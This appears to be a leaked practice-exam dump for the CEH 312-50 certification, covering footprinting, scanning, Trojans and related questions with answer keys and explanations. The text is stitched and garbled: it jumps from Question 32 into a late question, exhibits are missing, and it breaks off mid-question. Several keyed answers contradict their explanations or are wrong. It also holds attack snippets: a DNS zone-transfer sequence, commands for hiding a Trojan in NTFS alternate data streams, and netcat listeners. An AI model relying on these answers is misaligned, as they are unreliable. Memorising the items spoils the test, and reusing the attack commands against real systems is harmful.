Exam : 312-50
Title : Ethical Hacker Certified
Ver

: 02-23-2009

312-50

QUESTION 1:
What is the essential difference between an 'Ethical Hacker' and a 'Cracker'?
A. The ethical hacker does not use the same techniques or skills as a cracker.
B. The ethical hacker does it strictly for financial motives unlike a cracker.
C. The ethical hacker has authorization from the owner of the target.
D. The ethical hacker is just a cracker who is getting paid.
Answer: C
Explanation: The ethical hacker uses the same techniques and skills as a cracker and the motive is to find the security breaches before a cracker does. There is nothing that says that a cracker does not get paid for the work he does, a ethical hacker has the owners authorization and will get paid even if he does not succeed to penetrate the target.
QUESTION 2:
What does the term "Ethical Hacking" mean?
A. Someone who is hacking for ethical reasons.
B. Someone who is using his/her skills for ethical reasons.
C. Someone who is using his/her skills for defensive purposes.
D. Someone who is using his/her skills for offensive purposes.
Answer: C
Explanation: Ethical hacking is only about defending your self or your employer against malicious persons by using the same techniques and skills.
QUESTION 3:
Who is an Ethical Hacker?
A. A person whohacksfor ethical reasons
B. A person whohacksfor an ethical cause
C. A person whohacksfor defensive purposes
D. A person whohacksfor offensive purposes
Answer: C
Explanation: The Ethical hacker is a security professional who applies his hacking skills for defensive purposes.

Actualtests.com - The Power of Knowing

312-50
QUESTION 4:
What is "Hacktivism"?
A. Hacking for a cause
B. Hacking ruthlessly
C. An association which groups activists
D. None of the above
Answer: A
Explanation: The term was coined by author/critic Jason Logan Bill Sack in an article about media artist Shu Lea Cheang. Acts of hacktivism are carried out in the belief that proper use of code will have leveraged effects similar to regular activism or civil disobedience.
QUESTION 5:
Where should a security tester be looking for information that could be used by an attacker against an organization? (Select all that apply)
A. CHAT rooms
B. WHOIS database
C. News groups
D. Web sites
E. Search engines
F. Organization's own web site
Answer: A, B, C, D, E, F
Explanation: A Security tester should search for information everywhere that he/she can access. You never know where you find that small piece of information that could penetrate a strong defense.
QUESTION 6:
What are the two basic types of attacks?(Choose two.
A. DoS
B. Passive
C. Sniffing
D. Active
E. Cracking
Answer: B, D

Actualtests.com - The Power of Knowing

312-50

Explanation: Passive and active attacks are the two basic types of attacks.
QUESTION 7:
You are footprinting Acme.com to gather competitive intelligence. You visit the acme.com websire for contact information and telephone number numbers but do not find it listed there. You know that they had the entire staff directory listed on their website 12 months ago but now it is not there. How would it be possible for you to retrieve information from the website that is outdated?
A. Visit google search engine and view the cached copy.
B. Visit Archive.org site to retrieve the Internet archive of the acme website.
C. Crawl the entire website and store them into your computer.
D. Visit the company's partners and customers website for this information.
Answer: B
Explanation: The Internet Archive (
IA) is a non-profit organization dedicated to maintaining an archive of Web and multimedia resources. Located at the Presidio in San Francisco, California, this archive includes "snapshots of the World Wide Web" (archived copies of pages, taken at various points in time), software, movies, books, and audio recordings
(including recordings of live concerts from bands that allow it). This site is found at www.archive.org. QUESTION 8:
User which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud?
A. 18 U.S.C 1029 Possession of Access Devices
B. 18 U.S.C 1030 Fraud and related activity in connection with computers
C. 18 U.S.C 1343 Fraud by wire, radio or television
D. 18 U.S.C 1361 Injury to Government Property
E. 18 U.S.C 1362 Government communication systems
F. 18 U.S.C 1831 Economic Espionage Act
G. 18 U.S.C 1832 Trade Secrets Act
Answer: B
Explanation:
http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_00001030----000-.html
QUESTION 9:

Actualtests.com - The Power of Knowing

312-50
Which of the following activities will NOT be considered as passive footprinting?
A. Go through the rubbish to find out any information that might have been discarded.
B. Search on financial site such as Yahoo Financial to identify assets.
C. Scan the range of IP address found in the target DNS database.
D. Perform multiples queries using a search engine.
Answer: C
Explanation:
Passive footprinting is a method in which the attacker never makes contact with the target systems. Scanning the range of IP addresses found in the target DNS is considered making contact to the systems behind the IP addresses that is targeted by the scan.
QUESTION 10:
Which one of the following is defined as the process of distributing incorrect
Internet Protocol (IP) addresses/names with the intent of diverting traffic?
A. Network aliasing
B. Domain Name Server (DNS) poisoning
C. Reverse Address Resolution Protocol (ARP)
D. Port scanning
Answer: B
Explanation:
This reference is close to the one listed DNS poisoning is the correct answer.
This is how DNS DOS attack can occur. If the actual DNS records are unattainable to the attacker for him to alter in this fashion, which they should be, the attacker can insert this data into the cache of there server instead of replacing the actual records, which is referred to as cache poisoning.
QUESTION 11:
You are footprinting an organization to gather competitive intelligence. You visit the company's website for contact information and telephone numbers but do not find it listed there. You know that they had the entire staff directory listed on their website 12 months ago but not it is not there.
How would it be possible for you to retrieve information from the website that is outdated? A. Visit google's search engine and view the cached copy.
B. Visit Archive.org web site to retrieve the Internet archive of the company's website.
C. Crawl the entire website and store them into your computer.
Actualtests.com - The Power of Knowing

312-50
D. Visit the company's partners and customers website for this information.
Answer: B
Explanation: Archive.org mirrors websites and categorizes them by date and month depending on the crawl time. Archive.org dates back to 1996, Google is incorrect because the cache is only as recent as the latest crawl, the cache is over-written on each subsequent crawl. Download the websiteis incorrect because that's the same as what you see online. Visiting customer partners websites is just bogus. The answer is then Firmly,
C, archive.org
QUESTION 12:
A Certkiller security System Administrator is reviewing the network system log files.
He notes the following:
- Network log files are at 5 MB at 12:00 noon.
- At 14:00 hours, the log files at 3 MB.
What should he assume has happened and what should he do about the situation?
A. He should contact the attacker's ISP as soon as possible and have the connection disconnected. B. He should log the event as suspicious activity, continue to investigate, and take further steps according to site security policy.
C. He should log the file size, and archive the information, because the router crashed.
D. He should run a file system check, because the Syslog server has a self correcting file system problem.
E. He should disconnect from the Internet discontinue any further unauthorized use, because an attack has taken place.
Answer: B
Explanation: You should never assume a host has been compromised without verification. Typically, disconnecting a server is an extreme measure and should only be done when it is confirmed there is a compromise or the server contains such sensitive data that the loss of service outweighs the risk. Never assume that any administrator or automatic process is making changes to a system. Always investigate the root cause of the change on the system and follow your organizations security policy.
QUESTION 13:
To what does "message repudiation" refer to what concept in the realm of email security? A. Message repudiation means a user can validate which mail server or servers a message was passed through.
Actualtests.com - The Power of Knowing

312-50
B. Message repudiation means a user can claim damages for a mail message that damaged their reputation.
C. Message repudiation means a recipient can be sure that a message was sent from a particular person.
D. Message repudiation means a recipient can be sure that a message was sent from a certain host.
E. Message repudiation means a sender can claim they did not actually send a particular message. Answer: E
Explanation: A quality that prevents a third party from being able to prove that a communication between two other parties ever took place. This is a desirable quality if you do not want your communications to be traceable.
Non-repudiation is the opposite quality-a third party can prove that a communication between two other parties took place. Non-repudiation is desirable if you want to be able to trace your communications and prove that they occurred. Repudiation - Denial of message submission or delivery.
QUESTION 14:
How does Traceroute map the route that a packet travels from point A to point B?
A. It uses a TCP Timestamp packet that will elicit a time exceed in transit message.
B. It uses a protocol that will be rejected at the gateways on its way to its destination.
C. It manipulates the value of time to live (TTL) parameter packet to elicit a time exceeded in transit message.
D. It manipulated flags within packets to force gateways into generating error messages.
Answer: C
Explanation:
Traceroute works by increasing the "time-to-live" value of each successive batch of packets sent. The first three packets have a time-to-live (TTL) value of one
(implying that they make a single hop). The next three packets have a TTL value of
2, and so on. When a packet passes through a host, normally the host decrements the TTL value by one, and forwards the packet to the next host. When a packet with a TTL of one reaches a host, the host discards the packet and sends an ICMP time exceeded (type 11) packet to the sender. The traceroute utility uses these returning packets to produce a list of hosts that the packets have traversed en route to the destination. QUESTION 15:
Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why
Actualtests.com - The Power of Knowing

312-50 would you find this abnormal?
(Note: The student is being tested on concept learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dumo.)
05/20-17:06:45.061034 192.160.13.4:31337 -> 172.16.1.101:1
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0XA1D95 Ack: 0x53 Win: 0x400
...
05/20-17:06:58.685879 192.160.13.4:31337 ->
172.16.1.101:1024
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seg: 0XA1D95 Ack: 0x53 Win: 0x400
What is odd about this attack? (Choose the most appropriate statement)
A. This is not a spoofed packet as the IP stack has increasing numbers for the three flags.
B. This is back orifice activity as the scan comes from port 31337.
C. The attacker wants to avoid creating a sub-carrier connection that is not normally valid. D. There packets were created by a tool; they were not created by a standard IP stack.
Answer: B
Explanation:
Port 31337 is normally used by Back Orifice. Note that 31337 is hackers spelling of
'elite', meaning 'elite hackers'.
QUESTION 16:
Your Certkiller trainee Sandra asks you which are the four existing Regional
Internet Registry (RIR's)?
A. APNIC, PICNIC, ARIN, LACNIC
B. RIPE NCC, LACNIC, ARIN, APNIC
C. RIPE NCC, NANIC, ARIN, APNIC
D. RIPE NCC, ARIN, APNIC, LATNIC
Answer: B
Explanation: All other answers includenon existing organizations (PICNIC,
NANIC, LATNIC). See http://www.arin.net/library/internet_info/ripe.html
QUESTION 17:
A very useful resource for passively gathering information about a target company is: Actualtests.com - The Power of Knowing

312-50
A. Host scanning
B. Whois search
C. Traceroute
D. Ping sweep
Answer: B
Explanation: A, C & D are "Active" scans, the question says: "Passively"
QUESTION 18:
You receive an email with the following message:
Hello Steve,
We are having technical difficulty in restoring user database record after the recent blackout. Your account data is corrupted. Please logon to the SuperEmailServices.com and change your password. http://www.supermailservices.com@0xde.0xad.0xbe.0xef/support/logon.htm If you do not reset your password within 7 days, your account will be permanently disabled locking you out from our e-mail services.
Sincerely,
Technical Support
SuperEmailServices
From this e-mail you suspect that this message was sent by some hacker since you have been using their e-mail services for the last 2 years and they have never sent out an e-mail such as this. You also observe the URL in the message and confirm your suspicion about 0xde.0xad.0xbde.0xef which looks like hexadecimal numbers.
You immediately enter the following at Windows 2000 command prompt:
Ping0xde.0xad.0xbe.0xef
You get a response with a valid IP address.
What is the obstructed IP address in the e-mail URL?
A. 222.173.190.239
B. 233.34.45.64
C. 54.23.56.55
D. 199.223.23.45
Answer: A
Explanation: 0x stands for hexadecimal and DE=222, AD=173, BE=190 and EF=239
QUESTION 19:
Which of the following tools are used for footprinting?(Choose four.
A. Sam Spade
B. NSLookup
Actualtests.com - The Power of Knowing

312-50
C. Traceroute
D. Neotrace
E. Cheops
Answer: A, B, C, D
Explanation: All of the tools listed are used for footprinting except Cheops.
QUESTION 20:
According to the CEH methodology, what is the next step to be performed after footprinting? A. Enumeration
B. Scanning
C. System Hacking
D. Social Engineering
E. Expanding Influence
Answer: B
Explanation: Once footprinting has been completed, scanning should be attempted next. Scanning should take place on two distinct levels: network and host.
QUESTION 21:
NSLookup is a good tool to use to gain additional information about a target network. What does the following command accomplish? nslookup > server
> set type =any
> ls -d
A. Enables DNS spoofing
B. Loads bogus entries into the DNS table
C. Verifies zone security
D. Performs a zone transfer
E. Resets the DNS cache
Answer: D
Explanation: If DNS has not been properly secured, the command sequence displayed above will perform a zone transfer.
QUESTION 22:

Actualtests.com - The Power of Knowing

312-50
While footprinting a network, what port/service should you look for to attempt a zone transfer?
A. 53 UDP
B. 53 TCP
C. 25 UDP
D. 25 TCP
E. 161 UDP
F. 22 TCP
G. 60 TCP
Answer: B
Explanation: IF TCP port 53 is detected, the opportunity to attempt a zone transfer is there.
QUESTION 23:
Your lab partner is trying to find out more information about a competitors web site. The site has a .com extension. She has decided to use some online whois tools and look in one of the regional Internet registrys. Which one would you suggest she looks in first?
A. LACNIC
B. ARIN
C. APNIC
D. RIPE
E. AfriNIC
Answer: B
Explanation: Regional registries maintain records from the areas from which they govern. ARIN is responsible for domains served within North and South America and therefore, would be a good starting point for a .com domain.
QUESTION 24:
Network Administrator Patricia is doing an audit of the network. Below are some of her findings concerning DNS. Which of these would be a cause for alarm?
Select the best answer.
A. There are two external DNS Servers for Internet domains. Both are AD integrated.
B. All external DNS is done by an ISP.
C. Internal AD Integrated DNS servers are using private DNS names that are
A. unregistered.
Actualtests.com - The Power of Knowing

312-50
D. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server.
Answer: A
Explanations:
A. There are two external DNS Servers for Internet domains. Both are AD integrated.
This is the correct answer. Having an AD integrated DNS external server is a serious cause for alarm. There is no need for this and it causes vulnerability on the network.
B. All external DNS is done by an ISP.
This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk as it is offloaded onto the ISP.
C. Internal AD Integrated DNS servers are using private DNS names that are unregistered. This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk.
D. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server.
This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk.
QUESTION 25:
Doug is conducting a port scan of a target network. He knows that his client target network has a web server and that there is a mail server also which is up and running. Doug has been sweeping the network but has not been able to elicit any response from the remote target. Which of the following could be the most likely cause behind this lack of response? Select 4.
A. UDP is filtered by a gateway
B. The packet TTL value is too low and cannot reach the target
C. The host might be down
D. The destination network might be down
E. The TCP windows size does not match
F. ICMP is filtered by a gateway
Answer: A, B, C, F
Explanation: If the destination host or the destination network is down there is no way to get an answer and if TTL (Time To Live) is set too low the UDP packets will
"die" before reaching the host because of too many hops between the scanning computer and the target. The TCP receive window size is the amount of received data (in bytes) that can be buffered during a connection. The sending host can send only that amount of data before it must wait for an acknowledgment and window update from the receiving host and ICMP is mainly used for echo requests and not in port scans.

Actualtests.com - The Power of Knowing

312-50
QUESTION 26:
Exhibit

Joe Hacker runs the hping2 hacking tool to predict the target host's sequence numbers in one of the hacking session.
What does the first and second column mean? Select two.
A. The first column reports the sequence number
B. The second column reports the difference between the current and last sequence number C. The second column reports the next sequence number
D. The first column reports the difference between current and last sequence number
Answer: A, B
QUESTION 27:
While performing a ping sweep of a subnet you receive an ICMP reply of Code
3/Type 13 for all the pings sent out.
What is the most likely cause behind this response?
A. The firewall is dropping the packets.
B. An in-line IDS is dropping the packets.
C. A router is blocking ICMP.
D. The host does not respond to ICMP packets.
Answer: C
Explanation: Type 3 message = Destination Unreachable [RFC792], Code 13 (cause)
= Communication Administratively Prohibited [RFC1812]

Actualtests.com - The Power of Knowing

312-50
QUESTION 28:
The following excerpt is taken from a honeyput log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. Study the log given below and answer the following question:
(Note: The objective of this questions is to test whether the student has learnt about passive OS fingerprinting (which should tell them the OS from log captures): can they tell a SQL injection attack signature; can they infer if a user ID has been created by an attacker and whether they can read plain source - destination entries from log entries.)

What can you infer from the above log?
A. The system is a windows system which is being scanned unsuccessfully.
B. The system is a web application server compromised through SQL injection.
C. The system has been compromised and backdoored by the attacker.
D. The actual IP of the successful attacker is 24.9.255.53.
Answer: A
QUESTION 29:
Bob has been hired to perform a penetration test on Certkiller .com. He begins by looking at IP address ranges owned by the company and details of domain name registration. He then goes to News Groups and financial web sites to see if they are leaking any sensitive information of have any technical details online.
Within the context of penetration testing methodology, what phase is Bob involved with? A. Passive information gathering
Actualtests.com - The Power of Knowing

312-50
B. Active information gathering
C. Attack phase
D. Vulnerability Mapping
Answer: A
Explanation: He is gathering information and as long as he doesn't make contact with any of the targets systems he is considered gathering this information in a passive mode.
QUESTION 30:
Which of the following would be the best reason for sending a single SMTP message to an address that does not exist within the target company?
A. To create a denial of service attack.
B. To verify information about the mail administrator and his address.
C. To gather information about internal hosts used in email treatment.
D. To gather information about procedures that are in place to deal with such messages.
Answer: C
Explanation: The replay from the email server that states that there is no such recipient will also give you some information about the name of the email server, versions used and so on.
QUESTION 31:
You are conducting a port scan on a subnet that has ICMP blocked. You have discovered 23 live systems and after scanning each of them you notice that they all show port 21 in closed state.
What should be the next logical step that should be performed?
A. Connect to open ports to discover applications.
B. Perform a ping sweep to identify any additional systems that might be up.
C. Perform a SYN scan on port 21 to identify any additional systems that might be up.
D. Rescan every computer to verify the results.
Answer: C
Explanation: As ICMP is blocked you'll have trouble determining which computers are up and running by using a ping sweep. As all the 23 computers that you had discovered earlier had port 21 closed, probably any additional, previously unknown, systems will also have port 21 closed. By running a SYN scan on port 21 over the target network you might get replies from additional systems.

Actualtests.com - The Power of Knowing

312-50
QUESTION 32:
Ann would like to perform a reliable scan against a remote target. She is not concerned about being stealth at this point.
Which of the following type of scans would be the most accurate and reliable option? A. A half-scan
B. A UDP scan
C. A TCP Connect scan
D. A FIN scan
Answer: C
Explanation: A TCP Connect scan, named after the Unix connect() system call is the most accurate scanning method. If a port is open the operating system completes the
TCP three-way handshake, and the port scanner immediately closes the connection.
Otherwise an error code is returned.
Example of a three-way handshake followed by a reset:
Source Destination Summary
-------------------------------------[192.168.0.8] [192.168.0.10] TCP: D=80 S=49389 SYN SEQ=3362197786 LEN=0 WIN=5840
[192.168.0.10] [192.168.0.8] TCP: D=49389 S=80 SYN ACK=3362197787 SEQ=58695210 LEN=0
WIN=65535
[192.168.0.8] [192.168.0.10] TCP: D=80 S=49389 ACK=58695211 WIN c:\winnt\system32\calc.exe:anyfile.exe
A. HFS
B. ADS
C. NTFS
D. Backdoor access
Answer: B
Actualtests.com - The Power of Knowing

312-50

Explanation: ADS (or Alternate Data Streams) is a "feature" in the NTFS file system that makes it possible to hide information in alternate data streams in existing files. The file can have multiple data streams and the data streams are accessed by filename:stream.
QUESTION 169:
Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and forward it so that the server might perform undesirable actions.
Alternatively, the attacker could pose as the server or client after a legitimate authentication and gain unauthorized access to data. Which of the following is NOT a means that can be used to minimize or protect against such an attack?
A. Timestamps
B. SMB Signing
C. File permissions
D. Sequence numbers monitoring
Answer: A,B,D
QUESTION 170:
Which of the following steganography utilities exploits the nature of white space and allows the user to conceal information in these white spaces?
A. Snow
B. Gif-It-Up
C. NiceText
D. Image Hide
Answer: A
Explanation: The program snow is used to conceal messages in ASCII text by appending whitespace to the end of lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. And if the built-in encryption is used, the message cannot be read even if it is detected.
QUESTION 171:
_____ is found in all versions of NTFS and is described as the ability to fork file data into existing files without affecting their functionality, size, or display to traditional file browsing utilities like dir or Windows Explorer
A. Steganography
B. Merge Streams
Actualtests.com - The Power of Knowing

312-50
C. NetBIOS vulnerability
D. Alternate Data Streams
Answer: D
Explanation: ADS (or Alternate Data Streams) is a "feature" in the NTFS file system that makes it possible to hide information in alternate data streams in existing files. The file can have multiple data streams and the data streams are accessed by filename:stream.
QUESTION 172:
LM authentication is not as strong as Windows NT authentication so you may want to disable its use, because an attacker eavesdropping on network traffic will attack the weaker protocol. A successful attack can compromise the user's password. How do you disable LM authentication in Windows XP?
A. Stop the LM service in Windows XP
B. Disable LSASS service in Windows XP
C. Disable LM authentication in the registry
D. Download and install LMSHUT.EXE tool from Microsoft website
Answer: C
Explanation: http://support.microsoft.com/kb/299656
QUESTION 173:
How would you describe an attack where an attacker attempts to deliver the payload over multiple packets over long periods of time with the purpose of defeating simple pattern matching in IDS systems without session reconstruction? A characteristic of this attack would be a continuous stream of small packets.
A. Session Splicing
B. Session Stealing
C. Session Hijacking
D. Session Fragmentation
Answer: A
QUESTION 174:
Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products? A. Covert keylogger
Actualtests.com - The Power of Knowing

312-50
B. Stealth keylogger
C. Software keylogger
D. Hardware keylogger
Answer: D
Explanation: As the hardware keylogger never interacts with the Operating System it is undetectable by anti-virus or anti-spyware products.
QUESTION 175:
_____ is the process of converting something from one representation to the simplest form. It deals with the way in which systems convert data from one form to another.
A. Canonicalization
B. Character Mapping
C. Character Encoding
D. UCS transformation formats
Answer: A
Explanation: Canonicalization(abbreviated c14n) is the process of converting data that has more than one possible representation into a "standard" canonical representation. This can be done to compare different representations for equivalence, to count the number of distinct data structures (e.g., in combinatorics), to improve the efficiency of various algorithms by eliminating repeated calculations, or to make it possible to impose a meaningful sorting order.
QUESTION 176:
DRAG DROP
Drag the term to match with it's description
Exhibit:

Actualtests.com - The Power of Knowing

312-50

Answer:

Actualtests.com - The Power of Knowing

312-50

QUESTION 177:
You are a Administrator of Windows server. You want to find the port number for
POP3. What file would you find the information in and where?
Select the best answer.
A. %windir%\\etc\\services
B. system32\\drivers\\etc\\services
C. %windir%\\system32\\drivers\\etc\\services
D. /etc/services
E. %windir%/system32/drivers/etc/services
Answer: C
Explanations:
%windir%\\system32\\drivers\\etc\\services is the correct place to look for this information. QUESTION 178:
One of your junior administrator is concerned with Windows LM hashes and password cracking. In your discussion with them, which of the following are true statements that you would point out?
Select the best answers.
A. John the Ripper can be used to crack a variety of passwords, but one limitation is that the output doesn't show if the password is upper or lower case.
B. BY using NTLMV1, you have implemented an effective countermeasure to password
Actualtests.com - The Power of Knowing

312-50 cracking. C. SYSKEY is an effective countermeasure.
D. If a Windows LM password is 7 characters or less, the hash will be passed with the following characters, in HEX- 00112233445566778899.
E. Enforcing Windows complex passwords is an effective countermeasure.
Answer: A, C, E
Explanations:
John the Ripper can be used to crack a variety of passwords, but one limitation is that the output doesn't show if the password is upper or lower case. John the Ripper is a very effective password cracker. It can crack passwords for many different types of operating systems. However, one limitation is that the output doesn't show if the password is upper or lower case. BY using NTLMV1, you have implemented an effective countermeasure to password cracking. NTLM Version 2 (NTLMV2) is a good countermeasure to LM password cracking (and therefore a correct answer). To do this, set Windows 9x and NT systems to "send NTLMv2 responses only". SYSKEY is an effective countermeasure. It uses 128 bit encryption on the local copy of the Windows SAM. If a Windows LM password is 7 characters or less, the has will be passed with the following characters:
0xAAD3B435B51404EE
Enforcing Windows complex passwords is an effective countermeasure to password cracking. Complex passwords are- greater than 6 characters and have any 3 of the following 4 items: upper case, lower case, special characters, and numbers.
QUESTION 179:
In the following example, which of these is the "exploit"?
Today, Microsoft Corporation released a security notice. It detailed how a person could bring down the Windows 2003 Server operating system, by sending malformed packets to it. They detailed how this malicious process had been automated using basic scripting. Even worse, the new automated method for bringing down the server has already been used to perform denial of service attacks on many large commercial websites.
Select the best answer.
A. Microsoft Corporation is the exploit.
B. The security "hole" in the product is the exploit.
C. Windows 2003 Server
D. The exploit is the hacker that would use this vulnerability.
E. The documented method of how to use the vulnerability to gain unprivileged access.
Answer: E
Explanations:
Microsoft is not the exploit, but if Microsoft documents how the vulnerability can be used to gain unprivileged access, they are creating the exploit. If they just say that there is a hole in the product, then it is only a vulnerability. The security "hole" in the product is called the "vulnerability". It is documented in a way that shows how to use the
Actualtests.com - The Power of Knowing

312-50 vulnerability to gain unprivileged access, and it then becomes an "exploit". In the example given, Windows 2003 Server is the TOE (Target of Evaluation). A TOE is an IT
System, product or component that requires security evaluation or is being identified.
The hacker that would use this vulnerability is exploiting it, but the hacker is not the exploit. The documented method of how to use the vulnerability to gain unprivileged access is the correct answer.
QUESTION 180:
Assuring two systems that are using IPSec to protect traffic over the internet, what type of general attack could compromise the data?
A. Spoof Attack
B. Smurf Attack
C. Man in the Middle Attack
D. Trojan Horse Attack
E. Back Orifice Attack
Answer: D, E
Explanation:
To compromise the data, the attack would need to be executed before the encryption takes place at either end of the tunnel. Trojan Horse and Back Orifice attacks both allow for potential data manipulation on host computers. In both cases, the data would be compromised either before encryption or after decryption, so IPsec is not preventing the attack. QUESTION 181:
What is a Trojan Horse?
A. A malicious program that captures your username and password
B. Malicious code masquerading as or replacing legitimate code
C. An unauthorized user who gains access to your user database and adds themselves as a user D. A server that is to be sacrificed to all hacking attempts in order to log and monitor the hacking activity
Answer: B
Explanation:
A Trojan Horse is an apparently useful and innocent program containing additional hidden code which allows the unauthorized collection, exploitation, falsification, or destruction of data.

Actualtests.com - The Power of Knowing

312-50
QUESTION 182:
You want to use netcat to generate huge amount of useless network data continuously for various performance testing between 2 hosts.
Which of the following commands accomplish this?
A. Machine A
#yes AAAAAAAAAAAAAAAAAAAAAA | nc -v -v -l -p 2222 >
/dev/null
Machine B
#yes BBBBBBBBBBBBBBBBBBBBBB | nc machinea 2222 > /dev/null
B. Machine A cat somefile | nc -v -v -l -p 2222
Machine B cat somefile | nc othermachine 2222
C. Machine A nc -l -p 1234 | uncompress -c | tar xvfp
Machine B tar cfp - /some/dir | compress -c | nc -w 3 machinea 1234
D. Machine A while true : do nc -v -l -s -p 6000 machineb 2
Machine B while true ; do nc -v -l -s -p 6000 machinea 2 done Answer: A
Explanation:
Machine A is setting up a listener onport 2222using the nc command and then having the letter A sent an infinite amount of times, when yes is used to send data yes NEVER stops until it recieves a break signal from the terminal (Control+C), on the client end (machine
B), nc is being used as a client to connect to machine A, sending the letter B and infinite amount of times, while both clients have established a TCP connection each client is infinitely sending data to each other, this process will run FOREVER until it has been stopped by an administrator or the attacker.
QUESTION 183:
In the context of Trojans, what is the definition of a Wrapper?
A. An encryption tool to protect the Trojan.
B. A tool used to bind the Trojan with legitimate file.
C. A tool used to encapsulated packets within a new header and footer.
D. A tool used to calculate bandwidth and CPU cycles wasted by the Trojan.
Actualtests.com - The Power of Knowing

312-50

Answer: B
Explanation: These wrappers allow an attacker to take any executable back-door program and combine it with any legitimate executable, creating a Trojan horse without writing a single line of new code.
QUESTION 184:
After an attacker has successfully compromised a remote computer, what would be one of the last steps that would be taken to ensure that the compromise is not traced back to the source of the problem?
A. Install pactehs
B. Setup a backdoor
C. Cover your tracks
D. Install a zombie for DDOS
Answer: C
Explanation: As a hacker you don't want to leave any traces that could lead back to you. QUESTION 185:
Which of the following statements would not be a proper definition for a Trojan
Horse?
A. An unauthorized program contained within a legitimate program.
This unauthorized program performs functions unknown (and probably unwanted) by the user. B. A legitimate program that has been altered by the placement of unauthorized code within it; this code perform functions unknown (and probably unwanted) by the user.
C. An authorized program that has been designed to capture keyboard keystrokes while the user remains unaware of such an activity being performed.
D. Any program that appears to perform a desirable and necessary function but that
(because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.
Answer: C
Explanation: A Trojan is all about running unauthorized code on the users computer without the user knowing of it.
QUESTION 186:

Actualtests.com - The Power of Knowing

312-50
You have hidden a Trojan file virus.exe inside another file readme.txt using NTFS streaming. Which command would you execute to extract the Trojan to a standalone file?
A. c:\> type readme.txt:virus.exe > virus.exe
B. c:\> more readme.txt | virus.exe > virus.exe
C. c:\> cat readme.txt:virus.exe > virus.exe
D. c:\> list redme.txt$virus.exe > virus.exe
Answer: C
Explanation: cat will concatenate, or write, the alternate data stream to its own file named virus.exe
QUESTION 187:
You suspect that your Windows machine has been compromised with a Trojan virus. When you run anti-virus software it does not pick of the Trojan. Next you run netstat command to look for open ports and you notice a strange port 6666 open.
What is the next step you would do?
A. Re-install the operating system.
B. Re-run anti-virus software.
C. Install and run Trojan removal software.
D. Run utility fport and look for the application executable that listens on port 6666.
Answer: D
Explanation: Fport reports all open TCP/IP and UDP ports and maps them to the owning application. This is the same information you would see using the 'netstat
-an' command, but it also maps those ports to running processes with the PID, process name and path. Fport can be used to quickly identify unknown open ports and their associated applications.
QUESTION 188:
In Linux, the three most common commands that hackers usually attempt to Trojan are: A. car, xterm, grep
B. netstat, ps, top
C. vmware, sed, less
D. xterm, ps, nc
Answer: B

Actualtests.com - The Power of Knowing

312-50
Explanation:
The easiest programs to trojan and the smartest ones to trojan are ones commonly run by administrators and users, in this case netstat, ps, and top, for a complete list of commonly trojaned and rootkited software please reference this URL: http://www.usenix.org/publications/login/1999-9/features/rootkits.html QUESTION 189:
John wishes to install a new application onto his Windows 2000 server.
He wants to ensure that any application he uses has not been Trojaned.
What can he do to help ensure this?
A. Compare the file's MD5 signature with the one published on the distribution media
B. Obtain the application via SSL
C. Compare the file's virus signature with the one published on the distribution media
D. Obtain the application from a CD-ROM disc
Answer: A
Explanation: MD5 was developed by Professor Ronald L. Rivest of MIT. What it does, to quote the executive summary of rfc1321, is:
[The MD5 algorithm] takes as input a message of arbitrary length and produces as output a 128-bit "fingerprint" or "message digest" of the input. It is conjectured that it is computationally infeasible to produce two messages having the same message digest, or to produce any message having a given prespecified target message digest. The MD5 algorithm is intended for digital signature applications, where a large file must be
"compressed" in a secure manner before being encrypted with a private (secret) key under a public-key cryptosystem such as RSA.
In essence, MD5 is a way to verify data integrity, and is much more reliable than checksum and many other commonly used methods.
QUESTION 190:
Jason's Web server was attacked by a trojan virus. He runs protocol analyzer and notices that the trojan communicates to a remote server on the Internet. Shown below is the standard "hexdump" representation of the network packet, before being decoded. Jason wants to identify the trojan by looking at the destination port number and mapping to a trojan-port number database on the Internet. Identify the remote server's port number by decoding the packet?
A. Port 1890 (Net-Devil Trojan)
B. Port 1786 (Net-Devil Trojan)
C. Port 1909 (Net-Devil Trojan)
D. Port 6667 (Net-Devil Trojan)
Answer: D
Actualtests.com - The Power of Knowing

312-50
From trace, 0x1A0B is 6667, IRC Relay Chat, which is one port used. Other ports are in the 900's.
QUESTION 191:
Which of the following Netcat commands would be used to perform a UDP scan of the lower 1024 ports?
A. Netcat -h -U
B. Netcat -hU
C. Netcat -sU -p 1-1024
D. Netcat -u -v -w2 1-1024
E. Netcat -sS -O target/1024
Answer: D
Explanation: The proper syntax for a UDP scan using Netcat is "Netcat -u -v -w2 1-1024". Netcat is considered the Swiss-army knife of hacking tools because it is so versatile.
QUESTION 192:
Sniffing is considered an active attack.
A. True
B. False
Answer: B
Explanation: Sniffing is considered a passive attack.
QUESTION 193:
A file integrity program such as Tripwire protects against Trojan horse attacks by:
A. Automatically deleting Trojan horse programs
B. Rejecting packets generated by Trojan horse programs
C. Using programming hooks to inform the kernel of Trojan horse behavior
D. Helping you catch unexpected changes to a system utility file that might indicate it had been replaced by a Trojan horse
Answer: D
Explanation: Tripwire generates a database of the most common files and directories on your system. Once it is generated, you can then check the current state of your system against the original database and get a report of all the files
Actualtests.com - The Power of Knowing

312-50 that have been modified, deleted or added. This comes in handy if you allow other people access to your machine and even if you don't, if someone else does get access, you'll know if they tried to modify files such as /bin/login etc.
QUESTION 194:
Erik notices a big increase in UDP packets sent to port 1026 and 1027 occasionally.
He enters the following at the command prompt.
$ nc -l -p 1026 -u -v
In response, he sees the following message. cell(?(c)????STOPALERT77STOP! WINDOWS REQUIRES IMMEDIATE
ATTENTION.
Windows has found 47 Critical Errors.
To fix the errors please do the following:
